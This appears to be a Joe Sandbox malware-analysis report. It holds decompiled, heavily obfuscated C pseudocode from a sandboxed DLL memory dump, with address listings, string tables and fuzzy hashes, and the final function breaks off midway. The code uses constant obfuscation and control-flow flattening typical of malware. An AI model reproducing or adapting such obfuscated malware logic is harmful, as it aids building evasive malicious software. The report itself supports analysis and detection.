0x1000cfe3
0x1000cfe7
0x1000cfe7
0x1000cfec
0x1000cfec
0x1000cff1
0x1000cff1
0x1000cff1
0x1000cff3
0x00000000
0x00000000
0x00000000
0x1000cff3
0x00000000
0x1000cff1
0x1000cfe3
0x1000d04a
0x1000d029
0x1000d021
0x1000d019
0x1000d011
0x1000d005
0x1000d1a6
0x1000d1a6
0x00000000
0x1000d15c
0x1000d162
0x1000d262
0x1000d267
0x1000d273
0x00000000
0x1000d269
0x1000d269
0x00000000
0x1000d269
0x1000d168
0x1000d16e
0x1000d245
0x1000d24b
0x1000d25a
0x00000000
0x1000d174
0x1000d174
0x1000d17b
0x1000d1fa
0x1000d1ff
0x1000d204
0x00000000
0x1000d20a
0x1000d20e
0x1000d216
0x1000d228
0x1000d22c
0x1000d230
0x00000000
0x1000d230
0x00000000
0x1000d17d
0x1000d183
0x00000000
0x1000d19b
0x00000000
0x1000d183
0x1000d17b
0x1000d16e
0x00000000
0x1000d162
0x1000cff1
0x1000cfec
0x1000cfe7

Strings

025, xrefs: 1000D24D
-, xrefs: 1000CD3D
K), xrefs: 1000CE1E
v[, xrefs: 1000CCFF
+I, xrefs: 1000CDFC
lvRw, xrefs: 1000CB71
7<, xrefs: 1000CEBF
Wf, xrefs: 1000CF17
FX, xrefs: 1000CF39
]<, xrefs: 1000CB92
025, xrefs: 1000D17D
025, xrefs: 1000D06A

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -$+I$025$025$025$7<$FX$K)$Wf$]<$lvRw$v[
API String ID: 0-1561473747
Opcode ID: c0770792cf82ae2b9e4ac636a34dcb648dc708d056a1601b2e7f761c4e2546bd
Instruction ID: cae96183d17b9bcd883d344098e46e2e598f970869b0c4de0da45d8b07f7539f
Opcode Fuzzy Hash: c0770792cf82ae2b9e4ac636a34dcb648dc708d056a1601b2e7f761c4e2546bd
Instruction Fuzzy Hash: F51221725083819FE3A4CF25C989A4FBBE2FBC4398F10891DF5D996264C7B589498F43

Uniqueness

Uniqueness Score: -1.00%

Function 10017187 Relevance: 15.4, Strings: 12, Instructions: 369
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E10017187(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr* _v152;
				char _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _t406;
				signed int _t410;
				void* _t417;
				intOrPtr _t433;
				intOrPtr* _t436;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				intOrPtr _t485;
				void* _t486;
				intOrPtr* _t493;
				signed int* _t494;
				signed int* _t495;
				signed int* _t496;

				_t436 = __ecx;
				_t494 =  &_v320;
				_v144 = 0x3f72af;
				_v136 = 0;
				_v132 = 0;
				_v140 = 0x419dab;
				_v172 = 0xb463;
				_v148 = __edx;
				_t486 = 0x2fd49363;
				_v152 = __ecx;
				_t478 = 0x59;
				_v172 = _v172 / _t478;
				_v172 = _v172 ^ 0x00001d3c;
				_v212 = 0x8309;
				_v212 = _v212 | 0x8582e029;
				_v212 = _v212 ^ 0x8582ffb6;
				_v196 = 0x538d;
				_v196 = _v196 | 0x45df7b90;
				_v196 = _v196 ^ 0x45df0507;
				_v220 = 0x862c;
				_v220 = _v220 + 0xb39a;
				_v220 = _v220 ^ 0x00010d91;
				_v232 = 0x9f44;
				_v232 = _v232 ^ 0x181d052d;
				_t479 = 0x60;
				_v232 = _v232 / _t479;
				_v232 = _v232 ^ 0x00407958;
				_v164 = 0x87c0;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x000420a8;
				_v252 = 0x893b;
				_v252 = _v252 + 0xffff57e5;
				_v252 = _v252 + 0xffff4235;
				_v252 = _v252 ^ 0xffff2531;
				_v228 = 0xe4b4;
				_v228 = _v228 ^ 0x8f8823fd;
				_v228 = _v228 + 0xffffac51;
				_v228 = _v228 ^ 0x8f8836c7;
				_v292 = 0x30ec;
				_v292 = _v292 + 0xffff5b52;
				_v292 = _v292 + 0x6c9c;
				_v292 = _v292 << 0xa;
				_v292 = _v292 ^ 0xffe355d2;
				_v260 = 0x7acb;
				_v260 = _v260 + 0xffffa0ea;
				_v260 = _v260 | 0x99ee16c0;
				_v260 = _v260 ^ 0x99ee2715;
				_v236 = 0x660;
				_v236 = _v236 >> 3;
				_v236 = _v236 ^ 0xfad9dcdf;
				_v236 = _v236 ^ 0xfad9c9f6;
				_v188 = 0x2ec9;
				_v188 = _v188 * 0x1e;
				_v188 = _v188 ^ 0x00056cd6;
				_v176 = 0xdb2b;
				_v176 = _v176 + 0x1ae1;
				_v176 = _v176 ^ 0x0000f432;
				_v308 = 0x4019;
				_v308 = _v308 | 0x5723cddb;
				_v308 = _v308 << 6;
				_v308 = _v308 + 0xffff2d56;
				_v308 = _v308 ^ 0xc8f2fe5d;
				_v168 = 0x4395;
				_v168 = _v168 ^ 0x67ca4501;
				_v168 = _v168 ^ 0x67ca76df;
				_v264 = 0x84c6;
				_v264 = _v264 | 0x00adff5b;
				_v264 = _v264 + 0x6303;
				_v264 = _v264 ^ 0x00ae478b;
				_v244 = 0x4752;
				_v244 = _v244 + 0x93ca;
				_v244 = _v244 >> 9;
				_v244 = _v244 ^ 0x00006083;
				_v160 = 0x645a;
				_v160 = _v160 << 6;
				_v160 = _v160 ^ 0x00191e2a;
				_v276 = 0x9751;
				_v276 = _v276 << 8;
				_v276 = _v276 + 0xffff5caf;
				_t480 = 0xa;
				_v276 = _v276 / _t480;
				_v276 = _v276 ^ 0x000f67c9;
				_v180 = 0x8794;
				_v180 = _v180 << 2;
				_v180 = _v180 ^ 0x00025325;
				_v320 = 0x9a55;
				_v320 = _v320 << 0xf;
				_v320 = _v320 << 0xa;
				_t481 = 0x55;
				_v320 = _v320 * 0x4d;
				_v320 = _v320 ^ 0x22000a83;
				_v248 = 0xe379;
				_v248 = _v248 >> 7;
				_v248 = _v248 >> 0xc;
				_v248 = _v248 ^ 0x00003db5;
				_v284 = 0xccf8;
				_v284 = _v284 + 0x1e46;
				_v284 = _v284 * 0x38;
				_v284 = _v284 * 0x58;
				_v284 = _v284 ^ 0x11b007cd;
				_v300 = 0x32ae;
				_v300 = _v300 << 2;
				_v300 = _v300 >> 0x10;
				_v300 = _v300 << 0xe;
				_v300 = _v300 ^ 0x00000792;
				_v216 = 0x5329;
				_v216 = _v216 + 0xb5c4;
				_v216 = _v216 ^ 0x00016a2e;
				_v256 = 0xf2a3;
				_v256 = _v256 / _t481;
				_v256 = _v256 >> 6;
				_v256 = _v256 ^ 0x00001717;
				_v304 = 0x96fc;
				_v304 = _v304 | 0xda0a5c24;
				_t482 = 0x2b;
				_v304 = _v304 * 0x37;
				_v304 = _v304 + 0xd389;
				_v304 = _v304 ^ 0xd856d340;
				_v240 = 0x24a9;
				_v240 = _v240 >> 0xf;
				_v240 = _v240 | 0xd0db0b52;
				_v240 = _v240 ^ 0xd0db68a6;
				_v312 = 0x7296;
				_v312 = _v312 << 5;
				_v312 = _v312 >> 0x10;
				_v312 = _v312 >> 0x10;
				_v312 = _v312 ^ 0x000057a1;
				_v204 = 0xffd2;
				_v204 = _v204 + 0x4d88;
				_v204 = _v204 ^ 0x000119e7;
				_v316 = 0x8b8b;
				_v316 = _v316 / _t482;
				_v316 = _v316 ^ 0x980bb32c;
				_v316 = _v316 ^ 0xc4a4ea1d;
				_v316 = _v316 ^ 0x5caf30c9;
				_v268 = 0x337b;
				_v268 = _v268 + 0x5b7d;
				_v268 = _v268 + 0x12aa;
				_v268 = _v268 ^ 0x0000b326;
				_v296 = 0xc10a;
				_v296 = _v296 + 0xffff865a;
				_v296 = _v296 + 0x4a11;
				_v296 = _v296 + 0xffff623b;
				_v296 = _v296 ^ 0xffffbd38;
				_v208 = 0x68d9;
				_v208 = _v208 << 0xa;
				_v208 = _v208 ^ 0x01a30f5d;
				_v192 = 0x7a63;
				_v192 = _v192 << 0xc;
				_v192 = _v192 ^ 0x07a656ca;
				_v200 = 0x6d3e;
				_v200 = _v200 << 7;
				_v200 = _v200 ^ 0x003687c2;
				_v288 = 0x5a10;
				_v288 = _v288 << 9;
				_t483 = 0x69;
				_v288 = _v288 / _t483;
				_v288 = _v288 + 0x4454;
				_v288 = _v288 ^ 0x0001df75;
				_v224 = 0x28de;
				_v224 = _v224 >> 0xa;
				_v224 = _v224 + 0xffff52ce;
				_v224 = _v224 ^ 0xffff05f8;
				_v272 = 0xab64;
				_v272 = _v272 + 0xfffffe6e;
				_v272 = _v272 >> 4;
				_v272 = _v272 ^ 0xa501867a;
				_v272 = _v272 ^ 0xa501bad7;
				_v184 = 0xdf13;
				_v184 = _v184 + 0x420b;
				_v184 = _v184 ^ 0x00013cc7;
				_v280 = 0x5728;
				_v280 = _v280 + 0xffffcc3b;
				_v280 = _v280 + 0x76b7;
				_t484 = 0x61;
				_t493 = _a4;
				_t485 = _v148;
				_t433 = _v148;
				_v280 = _v280 / _t484;
				_v280 = _v280 ^ 0x00007737;
				while(_t486 != 0x9208284) {
					if(_t486 == 0xa621ed2) {
						E10006374(_v204, _t485,  *((intOrPtr*)(_t436 + 4)),  *_t436, _v316);
						_t436 = _v152;
						_t494 =  &(_t494[3]);
						_t486 = 0x29b23c8e;
						_t485 = _t485 +  *((intOrPtr*)(_t436 + 4));
						continue;
					}
					if(_t486 == 0x29b23c8e) {
						_push(0x1000151c);
						_push(_v208);
						E1000E9D6(_v192, __eflags, E1001CF31(_v268, _v296, __eflags), _v200, _v148, _v288, _v224, _t485);
						E10010D6D(_v272, _v184, _v280, _t420);
						return 1;
					}
					if(_t486 == 0x2fd49363) {
						_v156 = E1000A156();
						_t486 = 0x34a28646;
						L9:
						_t436 = _v152;
						continue;
					}
					if(_t486 == 0x34a28646) {
						_t486 = 0x37f3463b;
						_a4 =  *((intOrPtr*)(_t436 + 4)) + 0x1000;
						continue;
					}
					if(_t486 != 0x37f3463b) {
						L14:
						__eflags = _t486 - 0x2874212b;
						if(__eflags != 0) {
							continue;
						}
						L15:
						__eflags = 0;
						return 0;
					}
					_push(_t436);
					_t485 = E100054FB(_a4);
					 *_t493 = _t485;
					if(_t485 == 0) {
						goto L15;
					}
					_t486 = 0x9208284;
					_t433 = _a4 + _t485;
					goto L9;
				}
				_t406 = E1000F569(_v220,  &_v156, _v232, _v164);
				_t495 =  &(_t494[1]);
				_t339 = (_t406 & 0x0000000f) + 4; // 0x4
				E1000EF7F(_t339, _v228, _v292,  &_v156,  &_v128, _v260);
				 *((char*)(_t495 + (_t406 & 0x0000000f) + 0xf0)) = 0;
				_t410 = E1000F569(_v236,  &_v156, _v188, _v176);
				_t496 =  &(_t495[7]);
				_t352 = (_t410 & 0x0000000f) + 4; // 0x4
				E1000EF7F(_t352, _v168, _v264,  &_v156,  &_v64, _v244);
				_push(0x100015ac);
				_push(_v180);
				 *((char*)(_t496 + (_t410 & 0x0000000f) + 0x134)) = 0;
				_t417 = E1000D28D( &_v128, __eflags, _t433 - _t485, _v320, _v148, E1001CF31(_v160, _v276, __eflags), _v248, _v284, _v300, _v216, _v256, _t485);
				_t494 =  &(_t496[0x12]);
				_t485 = _t485 + _t417;
				__eflags = _t485;
				E10010D6D(_v304, _v240, _v312, _t414);
				_t436 = _v152;
				_t486 = 0xa621ed2;
				goto L14;
			}

0x10017187
0x10017187
0x1001718d
0x1001719a
0x100171a1
0x100171a8
0x100171b3
0x100171c9
0x100171d0
0x100171d9
0x100171e0
0x100171e5
0x100171ee
0x100171f9
0x10017204
0x1001720f
0x1001721a
0x10017225
0x10017230
0x1001723b
0x10017243
0x1001724b
0x10017253
0x1001725b
0x10017267
0x1001726a
0x1001726e
0x10017276
0x10017281
0x10017289
0x10017294
0x1001729c
0x100172a4
0x100172ac
0x100172b4
0x100172bc
0x100172c4
0x100172cc
0x100172d4
0x100172dc
0x100172e4
0x100172ec
0x100172f1
0x100172f9
0x10017301
0x10017309
0x10017311
0x10017319
0x10017321
0x10017326
0x1001732e
0x10017336
0x10017349
0x10017350
0x1001735b
0x10017366
0x10017371
0x1001737c
0x10017384
0x1001738c
0x10017391
0x10017399
0x100173a1
0x100173ac
0x100173b7
0x100173c2
0x100173ca
0x100173d2
0x100173da
0x100173e2
0x100173ec
0x100173f4
0x100173f9
0x10017401
0x1001740c
0x10017414
0x1001741f
0x10017427
0x1001742c
0x1001743a
0x1001743f
0x10017445
0x1001744d
0x10017458
0x10017460
0x1001746b
0x10017473
0x10017478
0x10017482
0x10017485
0x10017489
0x10017491
0x10017499
0x1001749e
0x100174a3
0x100174ab
0x100174b3
0x100174c0
0x100174c9
0x100174cd
0x100174d5
0x100174dd
0x100174e2
0x100174e7
0x100174ec
0x100174f4
0x100174fc
0x10017504
0x1001750c
0x1001751c
0x10017520
0x10017525
0x1001752d
0x10017535
0x10017542
0x10017543
0x10017547
0x1001754f
0x10017557
0x1001755f
0x10017564
0x1001756c
0x10017574
0x1001757c
0x10017581
0x10017586
0x1001758b
0x10017593
0x1001759e
0x100175a9
0x100175b4
0x100175c2
0x100175c6
0x100175ce
0x100175d6
0x100175e0
0x100175e8
0x100175f0
0x100175f8
0x10017600
0x10017608
0x10017610
0x10017618
0x10017620
0x10017628
0x10017633
0x1001763b
0x10017646
0x10017651
0x10017659
0x10017664
0x1001766f
0x10017677
0x10017682
0x1001768a
0x10017695
0x1001769a
0x100176a0
0x100176a8
0x100176b0
0x100176b8
0x100176bd
0x100176c5
0x100176cd
0x100176d5
0x100176dd
0x100176e2
0x100176ea
0x100176f2
0x100176fd
0x10017708
0x10017713
0x1001771b
0x10017723
0x1001772f
0x10017732
0x10017739
0x10017740
0x10017747
0x1001774b
0x10017753
0x10017765
0x10017809
0x1001780e
0x10017815
0x10017818
0x1001781d
0x00000000
0x1001781d
0x10017771
0x10017972
0x10017977
0x100179b0
0x100179c5
0x00000000
0x100179cf
0x1001777d
0x100177e9
0x100177f0
0x100177bf
0x100177bf
0x00000000
0x100177bf
0x10017785
0x100177cb
0x100177d5
0x00000000
0x100177d5
0x1001778d
0x10017959
0x10017959
0x1001795f
0x00000000
0x00000000
0x10017965
0x10017965
0x00000000
0x10017965
0x100177a1
0x100177a7
0x100177a9
0x100177af
0x00000000
0x00000000
0x100177b8
0x100177bd
0x00000000
0x100177bd
0x1001783b
0x10017840
0x10017853
0x1001786e
0x10017881
0x10017897
0x1001789c
0x100178af
0x100178ca
0x100178cf
0x100178d4
0x100178e6
0x1001792f
0x10017934
0x10017937
0x10017937
0x10017946
0x1001794d
0x10017954
0x00000000

Strings

>m, xrefs: 10017664
cz, xrefs: 10017646
0, xrefs: 100172D4
TD, xrefs: 100176A0
y, xrefs: 10017491
Zd, xrefs: 10017401
)S, xrefs: 100174F4
(W, xrefs: 10017713
}[, xrefs: 100175E8
7w, xrefs: 1001774B
+!t(, xrefs: 10017959
Xy@, xrefs: 1001726E

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: (W$)S$+!t($7w$>m$TD$Xy@$Zd$cz$y$}[$0
API String ID: 0-1558577346
Opcode ID: cc134d24d98a42968c462a902ea72914d5e58c5984ed8ba9abb0ec17979d6f0c
Instruction ID: c5cc13748979330c142c06835892ef7e2ff4daafd9166ec95eb798db0b61b50b
Opcode Fuzzy Hash: cc134d24d98a42968c462a902ea72914d5e58c5984ed8ba9abb0ec17979d6f0c
Instruction Fuzzy Hash: 4C122F725083819FE3A4CF21C489A8BBBF2FBC5758F10891CE5D9962A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001D02D Relevance: 15.2, Strings: 12, Instructions: 235
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E1001D02D() {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				void* _t261;
				void* _t264;
				void* _t276;
				intOrPtr _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int* _t308;

				_t308 =  &_v1668;
				_v1568 = 0x1b7baa;
				_t276 = 0x2bf07c54;
				_v1564 = 0;
				_v1620 = 0x5ac8;
				_v1620 = _v1620 | 0x6f7e2d8c;
				_v1620 = _v1620 + 0x1161;
				_v1620 = _v1620 ^ 0x6f7e9104;
				_v1632 = 0x343;
				_v1632 = _v1632 * 0x4f;
				_t299 = 0;
				_v1632 = _v1632 << 0xd;
				_v1632 = _v1632 + 0xffffca78;
				_v1632 = _v1632 ^ 0x203536e7;
				_v1640 = 0xae45;
				_v1640 = _v1640 >> 9;
				_t300 = 0x1d;
				_v1640 = _v1640 * 0x65;
				_v1640 = _v1640 + 0xffffcd5a;
				_v1640 = _v1640 ^ 0xffffb49c;
				_v1648 = 0xf6df;
				_v1648 = _v1648 ^ 0x32487b57;
				_v1648 = _v1648 << 0xf;
				_v1648 = _v1648 + 0xffff3bb0;
				_v1648 = _v1648 ^ 0x46c37aca;
				_v1656 = 0xe0fe;
				_v1656 = _v1656 | 0xbb3f58fa;
				_v1656 = _v1656 >> 1;
				_v1656 = _v1656 ^ 0x4bc4dda6;
				_v1656 = _v1656 ^ 0x165b1a8c;
				_v1664 = 0xf6b0;
				_v1664 = _v1664 * 0x33;
				_v1664 = _v1664 + 0xf145;
				_v1664 = _v1664 | 0xcc479c42;
				_v1664 = _v1664 ^ 0xcc77be62;
				_v1624 = 0x11e5;
				_v1624 = _v1624 >> 0xd;
				_v1624 = _v1624 ^ 0x0c673627;
				_v1624 = _v1624 ^ 0x0c670e7e;
				_v1660 = 0xb30e;
				_v1660 = _v1660 / _t300;
				_v1660 = _v1660 ^ 0x2f8cd0cc;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 ^ 0x335bb46d;
				_v1592 = 0x30a6;
				_v1592 = _v1592 + 0x2da3;
				_v1592 = _v1592 ^ 0x000056bb;
				_v1636 = 0x9dba;
				_v1636 = _v1636 << 5;
				_v1636 = _v1636 >> 0xd;
				_v1636 = _v1636 * 0x6e;
				_v1636 = _v1636 ^ 0x000074bb;
				_v1576 = 0xf88b;
				_v1576 = _v1576 >> 8;
				_v1576 = _v1576 ^ 0x00004a5e;
				_v1616 = 0xe870;
				_v1616 = _v1616 + 0xffffed0c;
				_v1616 = _v1616 << 0xa;
				_v1616 = _v1616 ^ 0x03558e80;
				_v1572 = 0x8968;
				_v1572 = _v1572 + 0xffff9e89;
				_v1572 = _v1572 ^ 0x000033ab;
				_v1584 = 0x6f5c;
				_v1584 = _v1584 | 0x7a285989;
				_v1584 = _v1584 ^ 0x7a28059f;
				_v1652 = 0x53fb;
				_t301 = 0x4a;
				_v1652 = _v1652 / _t301;
				_t302 = 0x51;
				_v1652 = _v1652 * 0x2e;
				_v1652 = _v1652 / _t302;
				_v1652 = _v1652 ^ 0x00006fe4;
				_v1644 = 0x731a;
				_v1644 = _v1644 | 0xb42c1025;
				_t303 = 0x26;
				_v1644 = _v1644 / _t303;
				_v1644 = _v1644 | 0x5ebde771;
				_v1644 = _v1644 ^ 0x5ebd9fe9;
				_v1608 = 0x9c04;
				_v1608 = _v1608 + 0xffffbe0d;
				_t304 = 0xf;
				_v1608 = _v1608 * 6;
				_v1608 = _v1608 ^ 0x00025ea7;
				_v1668 = 0x85df;
				_v1668 = _v1668 ^ 0xd0bd5991;
				_v1668 = _v1668 ^ 0x5dcfb772;
				_v1668 = _v1668 | 0x361cad49;
				_v1668 = _v1668 ^ 0xbf7e8aa2;
				_v1628 = 0x5370;
				_v1628 = _v1628 + 0x8359;
				_v1628 = _v1628 | 0x35599af6;
				_v1628 = _v1628 ^ 0x3559ade8;
				_v1600 = 0x3375;
				_v1600 = _v1600 + 0xffffeb08;
				_v1600 = _v1600 >> 0xd;
				_v1600 = _v1600 ^ 0x00002cf7;
				_v1596 = 0x275b;
				_v1596 = _v1596 + 0x8562;
				_v1596 = _v1596 / _t304;
				_v1596 = _v1596 ^ 0x000042b5;
				_v1588 = 0xe1bb;
				_t305 = 0x3c;
				_v1588 = _v1588 / _t305;
				_v1588 = _v1588 ^ 0x00004bb0;
				_v1604 = 0x7428;
				_v1604 = _v1604 | 0x56b3a402;
				_v1604 = _v1604 + 0xffffe147;
				_v1604 = _v1604 ^ 0x56b399df;
				_v1612 = 0xaa76;
				_v1612 = _v1612 + 0x75ae;
				_v1612 = _v1612 | 0x3c256991;
				_v1612 = _v1612 ^ 0x3c250096;
				_v1580 = 0xd062;
				_v1580 = _v1580 ^ 0x00008aa5;
				do {
					while(_t276 != 0x1ed979be) {
						if(_t276 == 0x2bf07c54) {
							_push(_t276);
							E1000471A(_v1620,  &_v1560, _v1632, _v1640, _v1648, _v1656, _v1664);
							_t308 =  &(_t308[8]);
							_t276 = 0x2f47d6b1;
							continue;
						} else {
							_t312 = _t276 - 0x2f47d6b1;
							if(_t276 == 0x2f47d6b1) {
								_push(0x10001308);
								_push(_v1636);
								_push(_v1592);
								_t264 = E10005DFC(_v1624, _v1660, _t312);
								E1001D4E1( &_v1040, _t312);
								E100098C5(0x104, _t312, _v1576, _v1616, _v1572, _v1584, _v1652,  *0x10021088 + 0x254, _v1644, _v1608,  &_v1040,  *0x10021088 + 0x38, _t264,  &_v1560);
								E10010D6D(_v1668, _v1628, _v1600, _t264);
								_t308 =  &(_t308[0x11]);
								_t276 = 0x1ed979be;
								continue;
							}
						}
						goto L7;
					}
					_push(0);
					_push( &_v520);
					_push(_v1580);
					_push(_v1612);
					_push(_v1604);
					_push(_v1588);
					_push(0);
					_push(0);
					_t261 = E10006417(_v1596, __eflags);
					_t308 =  &(_t308[8]);
					__eflags = _t261;
					_t299 =  !=  ? 1 : _t299;
					_t276 = 0x35e6e12b;
					L7:
					__eflags = _t276 - 0x35e6e12b;
				} while (__eflags != 0);
				return _t299;
			}

0x1001d02d
0x1001d033
0x1001d040
0x1001d045
0x1001d049
0x1001d051
0x1001d059
0x1001d061
0x1001d069
0x1001d07b
0x1001d07f
0x1001d081
0x1001d086
0x1001d08e
0x1001d096
0x1001d09e
0x1001d0a8
0x1001d0ab
0x1001d0af
0x1001d0b7
0x1001d0bf
0x1001d0c7
0x1001d0cf
0x1001d0d4
0x1001d0dc
0x1001d0e4
0x1001d0ec
0x1001d0f4
0x1001d0f8
0x1001d100
0x1001d108
0x1001d115
0x1001d119
0x1001d121
0x1001d129
0x1001d131
0x1001d139
0x1001d13e
0x1001d146
0x1001d14e
0x1001d15c
0x1001d160
0x1001d168
0x1001d16d
0x1001d175
0x1001d17d
0x1001d185
0x1001d18d
0x1001d195
0x1001d19a
0x1001d1a4
0x1001d1a8
0x1001d1b0
0x1001d1b8
0x1001d1bd
0x1001d1c5
0x1001d1cd
0x1001d1d5
0x1001d1da
0x1001d1e2
0x1001d1ea
0x1001d1f2
0x1001d1fa
0x1001d202
0x1001d20a
0x1001d214
0x1001d220
0x1001d225
0x1001d235
0x1001d238
0x1001d244
0x1001d248
0x1001d250
0x1001d258
0x1001d264
0x1001d269
0x1001d26f
0x1001d277
0x1001d27f
0x1001d287
0x1001d294
0x1001d297
0x1001d29b
0x1001d2a3
0x1001d2ab
0x1001d2b3
0x1001d2bb
0x1001d2c3
0x1001d2cb
0x1001d2d3
0x1001d2db
0x1001d2e3
0x1001d2eb
0x1001d2f3
0x1001d2fb
0x1001d300
0x1001d308
0x1001d310
0x1001d320
0x1001d324
0x1001d32c
0x1001d338
0x1001d33b
0x1001d33f
0x1001d347
0x1001d34f
0x1001d357
0x1001d35f
0x1001d367
0x1001d36f
0x1001d377
0x1001d37f
0x1001d387
0x1001d397
0x1001d39f
0x1001d39f
0x1001d3b1
0x1001d464
0x1001d485
0x1001d48a
0x1001d48d
0x00000000
0x1001d3b7
0x1001d3b7
0x1001d3b9
0x1001d3bf
0x1001d3c4
0x1001d3c8
0x1001d3d4
0x1001d3e2
0x1001d43d
0x1001d452
0x1001d457
0x1001d45a
0x00000000
0x1001d45a
0x1001d3b9
0x00000000
0x1001d3b1
0x1001d494
0x1001d49c
0x1001d49d
0x1001d4a1
0x1001d4a5
0x1001d4a9
0x1001d4b1
0x1001d4b2
0x1001d4b3
0x1001d4ba
0x1001d4be
0x1001d4c0
0x1001d4c3
0x1001d4c8
0x1001d4c8
0x1001d4c8
0x1001d4e0

Strings

pS, xrefs: 1001D2CB
[', xrefs: 1001D308
(t, xrefs: 1001D347
+5, xrefs: 1001D4C3
\o, xrefs: 1001D1FA
^J, xrefs: 1001D1BD
+5, xrefs: 1001D4C8
W{H2, xrefs: 1001D0C7
p, xrefs: 1001D1C5
o, xrefs: 1001D248
65 , xrefs: 1001D08E
u3, xrefs: 1001D2EB

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: (t$+5$+5$W{H2$['$\o$^J$pS$p$u3$65 $o
API String ID: 0-2856137141
Opcode ID: 12d230b4ff3b8b053a22578740a83933f073de9ad24c9c9d6107b6d2f92af6be
Instruction ID: e2ce323fef6e2add0cf1c5df375e9217e8b1e7fcabed41443f48952968d0f11d
Opcode Fuzzy Hash: 12d230b4ff3b8b053a22578740a83933f073de9ad24c9c9d6107b6d2f92af6be
Instruction Fuzzy Hash: 83C111B15083809FD368DF25C98994BFBE1FBC4758F104A1DF196862A0D7B9DA49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10003336 Relevance: 15.2, Strings: 12, Instructions: 153
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10003336(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				void* _t123;
				intOrPtr _t134;
				void* _t135;
				void* _t139;
				void* _t141;
				signed int _t153;
				signed int _t154;
				void* _t156;
				signed int* _t160;

				_push(_a20);
				_t139 = __ecx;
				_push(_a16);
				_push(1);
				_push(_a8);
				_push(1);
				_push(__edx);
				_push(__ecx);
				E10012550(_t123);
				_v60 = 0x58ef;
				_t160 =  &(( &_v64)[7]);
				_v60 = _v60 + 0xffff0633;
				_v60 = _v60 >> 9;
				_t156 = 0;
				_t141 = 0x2a642033;
				_t153 = 0x63;
				_v60 = _v60 * 0x2a;
				_v60 = _v60 ^ 0x14ffaedf;
				_v20 = 0x6a04;
				_v20 = _v20 + 0x32d0;
				_v20 = _v20 ^ 0x0000ddf0;
				_v48 = 0x380;
				_v48 = _v48 ^ 0x907d2ab9;
				_v48 = _v48 + 0x250e;
				_v48 = _v48 ^ 0x907d1045;
				_v52 = 0x47eb;
				_v52 = _v52 >> 0x10;
				_v52 = _v52 + 0xffff29cf;
				_v52 = _v52 ^ 0xffff09ac;
				_v24 = 0x6d24;
				_v24 = _v24 / _t153;
				_v24 = _v24 ^ 0x0000449d;
				_v28 = 0xbb34;
				_v28 = _v28 + 0xffffe3e2;
				_v28 = _v28 ^ 0x00008aa5;
				_v32 = 0x42c0;
				_v32 = _v32 << 8;
				_v32 = _v32 ^ 0x004292e1;
				_v36 = 0x1d03;
